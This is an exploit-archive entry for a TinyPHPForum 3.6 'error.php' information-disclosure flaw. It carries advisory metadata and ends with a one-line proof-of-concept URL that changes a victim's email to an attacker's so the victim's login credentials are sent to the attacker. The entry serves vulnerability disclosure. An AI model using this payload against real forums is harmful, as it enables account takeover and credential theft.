TinyPHPForum 3.6 - 'error.php' Information Disclosure
Author: SirDarckCat
type: webapps
platform: php
port:
date_added: 2006-08-01
date_updated: 2016-12-22
verified: 1
codes:
tags:
aliases:
screenshot_url:
application_url:
source: https://www.securityfocus.com/bid/19278/info
TinyPHPForum is prone to an information-disclosure vulnerability. This issue arises when a script allows a remote untrusted source to change a victim user's email address, and have their login credentials returned to an attacker.
Information that the attacker gathers by exploiting this vulnerability may aid in other attacks.
http://www.example.com/error.php?err=200&uname=victim&email=attacker@example.com